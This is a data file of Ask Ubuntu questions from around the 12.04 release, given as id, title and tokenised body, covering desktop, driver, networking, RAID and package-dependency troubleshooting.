138395	xorg randomly crashes	i keep getting a crash report saying xorg has crashed . it usually happens when i log in , but sometimes occurs afterwards . when i get the crash , nothing appears to be having trouble , so the first couple times i ignored it . i am running ubuntu 12.04 amd64 with xorg package `` xserver-xorg-core 2:1.11.4-0ubuntu10.1 ''
138396	software-center segmentation fault	can not open software-center : 2012-05-17 16:35:12,233 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-05-17 16:35:12,236 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-05-17 16:35:12,454 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-05-17 16:35:12,525 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) segmentation fault trying : rm -rf ~/.cache/software-center/ and sudo rm /var/cache/apt/*.bin does not help ...
138397	volume control 'out of phase ' with actual volume and alsamixer	i 'm setting up a friend 's hp presario ( quite old ) laptop with ubuntu 12.04 which used to work fine in 11.10 . however , the volume is completely silent until it is turned up to about 3/4 . past this point , it makes giant leaps all the way up to 100 % when volume is on full . alsamixer , however , shows this perfectly . the 'master ' bar stays at zero until the normal volume setting is past 3/4 , so it 's measuring actual volume perfectly . this suggests that it 's a problem with ubuntu 's volume control . edit - on the sound settings labelled volume slider ( at the bottom ) , the volume seems to be zero at the 'unamplified ' point ( 75 % across the bar ) and 100 % at the '100 % ' point .
138404	make a ubuntu boot cd without iso file	i have installed ubuntu using wubi and want to create a boot cd ... how can i do this without downloading the iso file ... .
138406	no ibus icon in kubuntu 12.04	i have the same problem as no ibus icon in kubuntu . i am trying to use ibus for japanese input in kubuntu , but neither the icon nor the candidates box appear . i have found a few threads online asking about the problem , but they all end unanswered and abandoned : (
138407	what is a segmentation fault ?	in ubuntu i have faced the segmentation fault error many times . what is a segmentation fault and when does it occur ?
138408	how to add display resolution fo an lcd in ubuntu 12.04 ? xrandr problem	i am fresh for ubuntu and linux in general . i have installed ubuntu 12.04 and stuck trying to setup correct resolution for my lcd display . the native resolution for the lcd is 1920x1080 here is the output from xrandr : $ xrandr screen 0 : minimum 320 x 200 , current 1280 x 720 , maximum 4096 x 4096 lvds1 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1280x720 60.0*+ 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) then i create new modeline : $ cvt 1920 1080 60 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync so far so good . then i create new mode using xrandr : $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync but for some reason that new mode was created for vga ( vga1 ) output instead of lcd output ( lvds1 ) : $ xrandr screen 0 : minimum 320 x 200 , current 1280 x 720 , maximum 4096 x 4096 lvds1 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1280x720 60.0*+ 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) 1920x1080_60.00 ( 0xbc ) 173.0mhz < -- -- -- -- -- ? ? ? ? ! ! ! ! ! ! h : width 1920 start 2048 end 2248 total 2576 skew 0 clock 67.2khz v : height 1080 start 1083 end 1088 total 1120 clock 60.0hz so , if i try to add mode to lvds1 , i get an error : $ xrandr -- addmode lvds1 `` 1920x1080_60.00 '' x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 149 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 25 current serial number in output stream : 26 adding that new mode to vga1 works fine , but i do n't use that vga1 output .
138409	/dev/md2 already in use and failed to start in degraded mode	a server i am working on has three raids . the first two raids are raid1 and run on two drives ( two partitions ) . one is / and one is swap . both of these function 100 % . however it is the third raid that i am having trouble with . it has 10 1tb drives in a raid10 configuration . these drives are housed in a sans digital elitestor and connected by a highpoint rocketraid . the rocketraid 's drivers did not work with the installation , but i could see the drives just fine . so i used a mdraid . on an occasional reboot while testing i have noticed that it will stop with these error messages : md/raid10 : md2 : not enough operational mirrors . md : pers- > run ( ) failed ... then it is followed by this strange message : mdadm : the device /dev/md2 is already in use could not start raid in degraded mode starting shell this raid serves as the /var where i intend to put both a website and host a fairly large database . here is the catch i have to send this about 200 miles away where it will be hosted , and each time it does this i can not ssh into the box . once i reboot it it appears to be fine for random number of times , but usually no more then three times . suggestions ?
138410	is it possible to use a custom wallpaper in 12.04 ?	a few weeks ago , i was unable to set a custom wallpaper on my desktop . when i did , i was unable to log in because the login screen hung . i 'm not sure if this is a bug or deliberate , but i 'd like to use a custom wallpaper on my desktop . is it possible ?
138411	updates listed but not installed	after upgrading to 12.04 gnome classic amd64 , several updates are listed in update manager , but do not install . in my x86 upgrade this is not happening . the amd64 upgrade is a disaster with many things not working , but the x86 works fine . the items are : ia32-libs-multiarch : i386 ; banshee-extension-soundmenu ; banshee
138420	multiple identical items in software sources other software	after upgrading to 12.04 gnome classic amd64 , i have multiple duplicate items , three each of `` conical partners-software packaged by canonical for their partners '' and `` conical partners-software packaged by canonical for their partner ( source codes ) '' . this did not happen on my x86 upgrade . this also shows up when updating by command line , w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems ... but running apt-get update does nothing here is /etc/apt/sources.list # deb cdrom : [ ubuntu 10.04 lts _lucid lynx_ - release amd64 ( 20100429 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mirrors.us.kernel.org/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirrors.us.kernel.org/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirrors.us.kernel.org/ubuntu/ precise universe deb http : //mirrors.us.kernel.org/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirrors.us.kernel.org/ubuntu/ precise multiverse deb http : //mirrors.us.kernel.org/ubuntu/ precise-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner deb http : //mirrors.us.kernel.org/ubuntu/ precise-security main restricted deb http : //mirrors.us.kernel.org/ubuntu/ precise-security universe deb http : //mirrors.us.kernel.org/ubuntu/ precise-security multiverse deb http : //archive.canonical.com/ precise partner deb http : //extras.ubuntu.com/ubuntu precise main # third party developers repository # deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu natty main # disabled on upgrade to natty # deb-src http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu natty main # disabled on upgrade to natty # deb http : //ppa.launchpad.net/videolan/master-daily/ubuntu natty main # disabled on upgrade to natty # deb-src http : //ppa.launchpad.net/videolan/master-daily/ubuntu natty main # disabled on upgrade to natty
138421	how to remove the mail/im icon from the notification area ?	how do i remove the mail/im icon ( envelope ) from the notification area in ubuntu 12.04 ? i 'm not using the im client nor thunderbird and would like to remove the icon .
138422	what is the difference between the release , share and submitubuntu commands in quickly ?	there are 3 different commands in quickly to release a new version of an app into a ppa release - posts a release of your project to a ppa on launchpad so that users can install the application on their system . share - updates your ppa with the the latest saved project changes . submitubuntu - posts a release of your project and submit it the ubuntu application review board so that any users can see and install the application ont their system . even after reading the help , i can not figure out when or if i should use each one of them . so what are the main differences between these commands and when should i use each one ?
138423	how do i change my timezone to utc/gmt ?	currently when i execute the date command from bash i get the following displayed thu may 17 12:21:00 ist 2012 below is my timezone config based on executing dpkg-reconfigure tzdata current default time zone : 'europe/dublin' local time is now : thu may 17 12:32:52 ist 2012 . universal time is now : thu may 17 11:32:52 utc 2012 . any idea how i change from ist to utc/gmt ?
138428	compiz not doing anything	i am trying to get the launcher icons to be a smaller size , the launcher to be less opaque , and the launcher to be fixed and never disappear off the left of the screen . but ... when i go into compiz -- > ubuntu unity plugin ( enabled ) -- > experimental move the `` panel opacity '' and `` launcher icon size '' icons left and right does n't do anything . any suggestions ? thanks !
138435	hud not work in all aplications ( ubuntu 12.04 )	when i want to close google chrome at hud , hud does not bring up the command to close the application . all the commands i 've typed in the hud , but it all does not work so , how to restore hud as before ?
138437	my error in 12.04 update ; wo n't boot now	i ran the update and the prompt said it was complete and to restart . i have a kvm switch and it was set to the other computer during the update . the updated machine did not recognize the mouse or keyboard . so , i `` pulsed '' the power switch to restart it . upon restart the system would not boot . is there a way to recover this system without a complete redo ?
138438	how to update firmware for different hardware	today i bought a webcam that is actually the first i know that has a firmware update ( did not even know that was possible/needed for a webcam ) . it got me thinking on how , for example i can update my intel motherboard via an burned iso image that carries the update and other ways to apply firmwares to different types of hardware . but since not all are that easy to upgrade , what applications or terminal ways are available in ubuntu to apply firmware updates to different hardware that only offer the update via windows . cases like motherboard , hard drive ( ssd specially since i will receive my first sdd next month ) , video cards , etc.. what are some of the ways to update hardware firmware in ubuntu . for this question i am incline to skip smartphones/cellphones since they have a different way of doing it . i want to focus on internal hardware and some external common ones , like the webcam i mentioned , printers ( if they happen to have firmware updates ) and other common computer hardware . note that there is no specific brand for a hardware . the question is looking for what ways in ubuntu are available to update the firmware of common hardware , including but not limited to for example burning an iso image of a firmware updater . but for other cases that do not offer an iso image , what ways exist to update the firmware .
138439	why does kmail make jpg files larger when i forward them ?	when i forward emails with jpeg attachments inline , the jpeg files size enlarge . is this normal ? can i turn it off ?
138443	wine 1.5 error ubuntu 12.04	i installed a program with wine 1.5 , but when i try to open it i get the following error the program ( a2j author ) is a program written in flash . do i need to install flash using wine as well ?
138445	wake-on-lan worked 3 times then no more	update : my main theories for now are ( see below for details ) : ubuntu system shuts down nic power in standby mode ? realtek rtl8111 driver for 64-bit machines does not work ? can anyone confirm or deny ? i installed ubuntu 12.04 a few days ago and got wake-on-lan to work by sending magic packets from a different pc after having put the ubuntu machine in standby via the desktop menu . i did this 3 times and it worked beautifully . then suddenly it did n't work anymore ! how on earth can this be possible ? ! i know potentially 1000 things can be wrong when wol does n't work but the fact it worked 3 consecutive times rules out most of them . it worked 3 times ( a few minutes apart ) and after that has never worked . during the 3 times it worked and the followingh 10 unsuccessful tries the only thing i fiddled with was the firewall on the pc that sends the magic packets , and i soon switched the firewall off to eliminate that potential problem , and also verified the packets come through with wireshark ( with the ubuntu machine on then of course ) . i made a full update of ubuntu a few hours before the tests started . most of the time i feel like i 'm just testing various things blindly . is there for example any way to check that power is n't shut down for the nic ? and does n't the `` cat /proc/acpi/wakeup '' being `` disabled '' mean something 's wrong ? there 's lots of threads on wol , i know , but none where it works perfectly for 10 minutes then stops working for no reason . a few threads mention problems with wol after 12.04 was installed . my only remaining idea right now is to install ubuntu 10 . but that would just be a test , not a permanent solution , and a very time consuming test . and i 'm sure rtl8111/rtl8168 is n't properly supported on older ubuntus ( there have been major problems with those nics with older ubuntus ) which complicates such a test even more . you should only have to read the text above to understand my problem . but for in-depth info , here are some facts and tests i 've done : i tried adding `` pci=noacpi '' , `` pci=noapic '' , `` acpi=force '' and `` apm=on apm=power-off '' to /etc/default/grub ( and i verified the changes in grab.cfg ) . one at a time of course ( reboot after each ) . i saw the nic was disabled in cat /proc/acpi/wakeup , enabled it with command `` echo -n lan | sudo tee /proc/acpi/wakeup '' and now lan was enabled in the list firewalls are disabled ethtool shows wol is in state `` g '' ( i tried setting it to `` pumbag '' , and also to `` d '' then `` g '' ) . it is an asus board with realtek rtl1111/r8168b ( driver r8169 came with the kernel and it was with that driver is worked 3 times ; lately i changed to driver r8168 which was n't easy but i ca n't see any difference and people seem to report r8169 should be used for all nowadays ) . i also tried using wireshark on the ubuntu machine to verify the magic packets got through to the pc tried resetting cmos ram ( both by jumper and removing battery for 5 minutes ) . nic led is not lit when in sleep but it 's also not lit on my other pc when in sleep and wol works for that pc . i tried enabling `` wake on when hit ps/2 spacebar '' in bios , started ubuntu , selected `` standby '' from menu so that it got into standby , pressed spacebar , and it started . also worked after terminal command pm-suspend and halt -p ( shuts down and reboots completely though ) but does not wake after command halt . halt makes the os shut down but the hw to remain on . still ignoring wol in all cases . when in standby the power led blinks , fans and hard disk are silent , and this remains the same after wol attempts program used for sending magic packets is : magicpacket ( dot ) free ( dot ) fr on a different ( windows ) pc settings for magic packet sender is udp port 80 subnet mask 255.255.255.255 and that 's the settings it worked with but i also tried ports 9 , 7 and 0 , tcp and mask 0.0.0.0 . have double checked mac address but i entered it via copy-and-paste and it has worked with these settings 3 times as i mentioned . i have only used ubuntu for a week ( have some brief experience with linux and unix systems from long ago ) i have n't added `` ethtool -s eth0 wol g '' ( or `` echo -n lan | sudo tee /proc/acpi/wakeup '' ) to startup scripts since i believe wol should work once if these things are set properly ( script are needed to make it work after each reboot ) the motherboard asus at5nm10t-i has no bios updates ( is v0306 ) tried most things on these pages : wiki.ubuntuusers.de/wake_on_lan -- en.gentoo-wiki.com/wiki/acpi/fix_common_problems # nothing_works -- wiki.xbmc.org/index.php ? title=how-to : enable_wake-on-device_for_ubuntu updates : yes i have enabled `` power on by pme '' ( pci power management events ) in bios . i also enabled `` power on by ring '' since someone suggested that in a forum but i ca n't believe it affects wol but also ca n't hurt . since it worked 3 rimes this is no bios settings problem . i actually tried reinstalling ubuntu 12.04 , and again it worked 3 times then after that is dead . ( actually this time it worked 1 time , then did n't work , then worked 2 times in a row , then never again . ) -- - some details on this new test which probably have no significance : it did n't work until i enabled samba properly for file sharing between pcs in a workgroup . the 3 times it worked i did not have to send sudo ethtool -s eth0 wol g ( sudo ethtool eth0 always reports it is in wol mode `` g '' so apparently my nic starts in that mode ) . and sudo cat /proc/acpi/wakeup now always shows lan as `` enabled '' now . this time i used the downloaded 12.04 without updates ( ubuntu 's desktop said there were no updates ) , later ( long after it stopped working ) it said there were 136 updates , i installed them and rebnooted , still did n't work . apparently this nic has been troublesome for linux users for years , but i thought it was working properly since recently , with the driver that comes with the kernel . it isone of the most common nics i think . update : i tested with ubuntu 11.10 . it has the same problems , or a version of it : wol seems to work about 1 out of 4 times . does n't suddenly stop working , just does n't work every time ( far from it ) . tested with windows 7 . installed realtek driver . ticked `` allow only magic packet to wake up '' in nic settings ( hw manager ) and it worked flawlessly , tested 5 times in a row . note : first i did n't bother to install video and audio drivers and then only hibernation worked , but it did respond to wol calls flawlessly . installed video and audio driver plus `` pc probe ii '' which seems to have something to do with acpi driver . did this after i read in wikipedia on acpi that windows might not allow standby ( s3 ) if one device in the system does n't support acpi . when in sleep mode ( or hibernation ) in windows , i can still see this unit in the router 's list of attached devices ( but the led on the nic is out ) . ( as i said before , for a different pc , it is not seen in this list even though wol works , so apparently this is n't always the case ) . for this pc , however , it might indicate that the nic has n't any power , i e that the problem here is that ubuntu shuts down the nics power . i forgot to mention my machines are all 64 bit . it is not so uncommon that 32 bit drivers work while 64 bit drivers do n't . so one suspicion is that the 64 bit realtek driver still does n't work properly on linux with rtl8111 etc - i know there 's been problems with these nics for years which i read were solved rather recently , but can anyone confirm they have rtl8111/rtl8168 & rtl8168b etc working with wol on a 64 bit machine ? so my main theories for now are : ubuntu system shuts down nic power in standby mode ? realtek driver for 64-bit machines does not work ?
138449	how do i compile and install the latest pitivi 0.15.2 ?	as there 's a critical bug in pitivi 0.15.1 ( version released in software center ) and i need to finish a project , i tried to install the latest version , 0.15.2 . i tried to add the ppa and to compile it ( i found the instructions at the pitivi website ) , but i had no luck . what should i do ? i 'm using ubuntu 12.04 in an imac 21'5 '' late 2009 .
138452	how do i get a canon lide 110 working ?	canon lide 110 worked fine with ubuntu 11.04 . when i upgraded to 12.04 ( unfortunately ) it does n't work anymore . is there anything that can be done so i can use my very nice scanner again ?
138454	running a 32 bit .bin file on 64 bit kubuntu	i am running a 64-bit version of kubuntu 12.04 . when trying to run a 32-bit .bin file i am getting the following error : $ ./jdevstudio11121install.bin ./jdevstudio11121install.bin : no such file or directory however when i run a file command i receive the following : $ file jdevstudio11121install.bin elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.2.5 , stripped how do i run this file ? is it possible to run 32-bit executable on a 64-bit os . please help me .
138455	where is the pygame template in quickly ?	same as the title says . when i want to create a new quickly project , i do n't get the pygame template option any longer . ubuntu-application ubuntu-cli ubuntu-flash-game those 3 are the templates that are available to use for me right now . did they remove it ?
138464	why ca n't i log in after unistalling python 2.7 and installing python 3 ?	i uninstalled the python 2.7 package to try and upgrade to python 3 . i uninstalled python 2.7 , and noticed some of my launcher items were completely gone . at this point i had installed python 3 . now on reboot , i ca n't log in and the background for the log-in screen is black with white dots . any help would be greatly appreciated . p.s . - this is running 11.10 oneiric ocelot . i still have the same version live cd . edit : thanks for the feedback ! but i ca n't boot into text mode , only boot from the live cd , and i ca n't connect to the internet because i installed the debian .tar.gz package usb_modeswitch for mobile broadband . is there a way to copy the python 2.7 parts of the os from the live cd and inject them into my system ? the only thing i can think of is get a 12.04 live cd and click 'upgrade from 11.10 to 12.04 ' option , but for reasons i wo n't go into this is impractical for me .
138472	how do i connect to a wpa wifi network using the command line ?	so basically , i 'd like to use iwconfig to connect to my wifi network when i 'm not inside x . but i just do n't see a way to do it in the man page . any idea ?
138478	is there a version of chrome or chromium whose bookmarks are visible to the hud ?	i noticed that firefox has bookmarks that can be executed in the hud . love it ! chrome and chromium , which run javascript apps much faster for some odd reason , allow for history to be called through the hud , but not bookmarks . this would n't be a problem if all history was callable , but it seems that chrome limits the amount of history visible to the hud . is there a version of chrome or chromium that will see our bookmarks ?
138480	how to fix black screen after boot	after fresh installation ubuntu 12.04 ( with wubi ) everything runs good . some updates were installed and after restart i saw the purple splash screen . then i got a black screen . i tried nomodeset but that did not work . i folow this instructions link . i have packard bell easynote tk36 with motherboard model sjv52_mv v1.06 . graphic is intel gma 4500mhd
138483	weird thing and need help-after installing ubuntu , ca n't see c drive from ubuntu , and d drive are no longer appered in windows	so i installed ubuntu on a computer , now when i login to ubuntu , i can see my d drive but not c. here a picture from ubuntu , the upper drive is d : but , throw win7 it 's different-the opposite . i can see c drive but d have disappeared ( i could see it before and there are some study files of mine ) thanks !
138484	why does apt think it needs this extra dependency ?	i 'm working on some machine setup instructions , and i was surprised to find out that apt-get install a b can behave differently than apt-get install a & & apt-get install b . my specific example is a == openjdk-7-jdk and b == ant . so , openjdk-7-jdk depends on openjdk-7-jre-headless , which satisfies ant 's dependency java6-runtime-headless . but if you install them as apt-get install openjdk-7-jdk ant , apt does n't seem to figure this out and installs default-jre-headless . but if you install openjdk-7-jdk prior to installing ant , its dependency is satisfied and all is good . apt is usually smart enough to figure this sort of thing out , so why ca n't it do so in this case ? i 'd like to have a better understanding as to why it works this way , so this sort of thing does n't trip me up again in the future .
138487	how to keep apache and mysql from starting automatically	is there a way to make apache and mysql not run automatically on startup ? currently , whenever i boot my machine , they start automatically and run in the background . i am using ubuntu 12.04 .
138491	single or multiple partition for 12.04 ?	currently , i 'm using ubuntu 10.04 with 5 partitions ( boot , root , home , swap , usr ) . i 'm going to replace 10.04 by 12.04 whereas my hard drive has 80gb . should i create multiple partitions for 12.04 or single partition ? if multiple , then how many and how much for each of them ? note : i have to use virtualbox on 12.04 . would be very grateful . thanks in advance .
138492	my wireless network not visible in wireless network list with a broadcom card	i have two configurations an older laptop ( lenovo 3000 c200 , network controller broadcom bcm4311 ) with ubuntu 10.04 and a newer laptop ( lenovo b570e , nw controller broadcom bcm4313 ) with the 12.04 ubuntu . in the first configuration i can see all my neighbours ' wireless networks + my own wireless , but with the second config i can not see my network ( i can see neighbours ' networks ) . any ideas ? i did not change wireless driver settings on the newer configuration . i think i did it on the older configuration because it was offered when i booted for the first time . i can connect to this network with both nokia and htc phones , so i would say the problem should not be on the router side .
138497	kwrite 's settings are n't saved	all : i have tried kwrite a few times ; but , so far , the settings i set edit them at are n't saved . i have to click on `` edit settings '' each time i start kwrite . any ideas about what to do out there ? keith lee
138498	how can i wipe my ultrabook that is running 11.10 ( no cd drive , just usb )	the links i have found refer to cd 's . is there a recommended or good way to do this all from a usb drive . i need to do a wipe to clear saved data , i.e . a 'write ' clean . then i 'll reinstall .
138503	non useable icons appearing in the unity dash ?	i have no idea what the heck is going on with the unity dash . however , or every application i have installed and is visible on the unity dash , their is a blank icon for it that shows the generic package icon . or an application like k3b , will not only have the functional icon , but it also shows the older icon as well . the new and old icons appear for evolution , and generic icons are `` peppered '' all over the place
138509	ubuntu 12.04 slow performance	just installed ubuntu 12.04 64-bit on my acer 5742 laptop . the performance is really slow . while browsing pictures in google , occasionally my system just freezes for about 5 seconds . also , installing applications takes a lot of time . for example , installing `` skype '' took me about 30 min or so . in october , i installed earlier version of ubuntu , and that version did not display any of these symptoms , so my laptop is n't to blame . and , my laptop 's specs are n't that bad : model : acer 5742g processor : intel pentium p6200 2.13ghz ( duo-core ) graphics card : amd radeon hd6370m , 512 mb ram/memory : 6gb 1066mhz hard drive : : 500gb ( 5200 rpm ) i tried both a usb hdd and my 5200 rpm 500gb hdd . i installed all the drivers that were displayed in additional drivers . but still , there is no improvement in performance . is it better to just install earlier version of ubuntu or what ?
138510	in the installer , when splitting an existing partition , which side is which ?	i am about to install ubuntu alongside windows . i 've reached a setup screen which has a movable partition bar , with one side for windows and the other side for ubuntu . but i can not see any obvious thing telling me which partition is which . so can someone tell me what the left side is and what the right side is ?
138521	wired network connection fails after installing ubuntu 12.04	having installed 12.04 amd64 desktop from the alternative iso ( i 'm using lvm on a raid5 array ) , my networking fails after booting into the installed system . it works fine on the 12.04 live cd and alternative desktop cd . it appears to bring up the interface correctly , but is n't finding anything on the other end . dhclient says that it ca n't find a broadcasting interface ( but works fine on the live cd ) . my networking hardware is an atheros ar8131 using the atl1c driver . i 've done nothing to the configuration since the installation . the output from the commands listed below is in this pastebin . lshw -c network dhclient -v grep eth0 /var/log/syslog
138522	how do i run a script when a bluetooth device connects ?	i 'd like to start my music player ( clementine ) when my bluetooth headset connects to my computer . how do i detect the bluetooth device connecting so i can run a script to start the player ?
138523	what 's the equivalent of `` add or remove programs '' in ubuntu ?	i wanted to install the plugin texlipse ( installation instructions ) and for that i am supposed to remove any previous version of it . maybe the eclipse gui is sufficient to achieve this end . what 's the equivalent of `` add or remove programs '' in ubuntu ?
138529	tk installation does n't work for ruby1.9.1	ok , this is what i did before i landed onto a terminal with a bunch of error messages ... first , i installed ruby1.9.1 using apt-get . ( all of those ruby1.9.1 packages including ruby1.9.1-examples and ruby1.9.1-full ) . then , i installed tcl8.5 and tk8.5 including their dev packages similarly . then , i installed libtcltk-ruby1.9.1 as expected , ruby -- version says that i have got ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ x86_64-linux ] but in irb , when i require 'tk ' it says : runtimeerror : tcltklib : fail to tk_init ( ) . ca n't find a usable tk.tcl in the following directories : /usr/share/tcltk/tcl8.5/tk8.5 /usr/lib/tk8.5 /usr/local/lib/tcltk/tk8.5 /usr/local/share/tcltk/tk8.5 /usr/lib/tcltk/tk8.5 /usr/share/tcltk/tk8.5 /lib/tk8.5 /usr/library /usr/share/tcltk/tk8.5/tk.tcl : version conflict for package `` tk '' : have 8.5.10 , need exactly 8.5.11 version conflict for package `` tk '' : have 8.5.10 , need exactly 8.5.11 while executing '' package require -exact tk 8.5.11 '' ( file `` /usr/share/tcltk/tk8.5/tk.tcl '' line 18 ) invoked from within '' source /usr/share/tcltk/tk8.5/tk.tcl '' ( `` uplevel '' body line 1 ) invoked from within '' uplevel # 0 [ list source $ file ] '' this probably means that tk was n't installed properly . from /usr/lib/ruby/1.9.1/tk.rb:31 : in `initialize' from /usr/lib/ruby/1.9.1/tk.rb:31 : in `initialize' from /usr/lib/ruby/1.9.1/tk.rb:1245 : in `new' from /usr/lib/ruby/1.9.1/tk.rb:1245 : in `block in < module : tkcore > ' similar procedure worked when i used ruby1.8 and same version of tcl and tk , but this does n't seem to work . i think it has something to do with these packages and their dependencies . so , finally my question is : how to install tk and ruby , if i want to program tk gui in ruby1.9 ?
138530	why do i get an `` unmet dependencies '' error when trying to install wine ?	when trying to install wine ( sudo apt-get install wine ) i get the following error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . google does tell me that apparently this has something to to with ia32-libs , but i can not find out how to do to fix the dependencies or if i need to ( manually ? ) install something else . i have added ppa : ubuntu-wine/ppa to my repositories . sudo apt-get install wine1.5gives me the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.4-0ubuntu1~ppa1~precise1+pulse17 ) sudo apt-get install wine1.5-i386gives me the following packages have unmet dependencies : wine1.5-i386 : i386 : depends : libgphoto2-2 : i386 ( > = 2.4.10.1 ) but it is not going to be installed depends : libgphoto2-port0 : i386 ( > = 2.4.10.1 ) but it is not going to be installed recommends : gettext : i386 but it is not going to be installed recommends : libsane : i386 but it is not going to be installed any help would be appreciated . thanks .
138532	12.04 server does not honor grub_gfxmode in /etc/default/grub ?	i 'm having an issue with ubuntu server not showing the correct graphics on the terminal , similar to the issue here . the text is all garbled after grub . unfortunately , the solution to that question does not appear to work in 12.04 server . the solution was to add grub_gfxmode=1024x768 to /etc/default/grub , run update-grub and then reboot . i 've tried this and it does not fix the problem in my case . i have also tried the instructions in this question which did not work either . i can get it to work by manually editing the grub options at boot and setting the graphics mode to 1024x768 , but that only works for one boot . how do i get the settings to stick ?
138535	updating new files in a external disk	i bought a 750gb external hard disk a couple months ago . so the first time i copied all my stuff ( documents , photos , music ... ) . after a while i wanted to update the data in my external disk , but i did n't remember exactly which files did i create , modify or delete since the last update . so i just ended up deleting everything from the external hard disk and coping everything back in . there has to be a better solution right ? something that acts like a version controller .
138537	how to install mysql gui tools in 12.04+ versions ?	i want to install the mysql gui tools in 12.04 and future version because frankly the way workbench works is not even close to how friendly the gui tools were , specially for simple stuff like doing a quick select of something or selecting a table . i like using mysql administrator and mysql query browser . the way they work is much more intuitive than workbench . how can i install them in 12.04 and newer versions ?
138544	yahoo and some other sites not working in ubuntu 12.04 lts . what will be the problem	i recently downloaded ubuntu 12.04 . my problem is yahoo and dailymotion like sites are not opening in my ubuntu edition and at the same time they are opening good in windows xp on the same machine , what would cause this problem , i tried in the all browsers ( p.s : gmail and youtube , facebook are some of the working sites in ubuntu ) pls help me
138547	how to understand the ubuntu file system layout ?	in windows there’re perhaps only a couple of important folders ( by important i mean important in my logical picture of the windows file system ) in the installation drive ( in my case c : \ ) . namely program files and windows . i simply stay away from windows folder and the “add remove program files” is good enough to handle the program files folder of windows . of course there’s a folder named users where the users ( who are not admins ) can access only their folders . thus there’s a clear picture at some level in my mind of the windows file system . in ubuntu , when i reach the location / , there’s a huge list of folders , most of which i have no clue as to what they contain . the /bin folder seems to be the equivalent of the windows folder in windows . the /usr folder seems like it’s the equivalent of the users folder in windows . but even the /home folder looks like it can fit the bill . please understand that i do understand , that ubuntu ( linux ) has a different character than that of windows , i.e. , there need not be exact equivalent of windows functions , in ubuntu . all i am looking for is a bit more clearer picture of the ubuntu file system . this question is a part of a bigger question which i am splitting up to make it more answerable . the original question can be found here : http : //sgsawant.wordpress.com/2012/05/17/whats-the-equivalent-of-add-or-remove-programs-in-ubuntu/
138548	alpha wireless adapter disconnect at random time	i have wireless adapter called alpha awus036h , it disconnects at random times , and reconnects again after several minutes , and that happens always . ubuntu 12.04 . i searched and found similar problems , it seems that was known problem in ubuntu ? how to stop disconnecting when using alfa wireless usb device ? thanks
